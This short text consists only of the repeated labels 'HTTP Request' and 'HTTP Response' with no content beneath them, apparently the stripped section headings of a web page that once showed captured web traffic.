HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request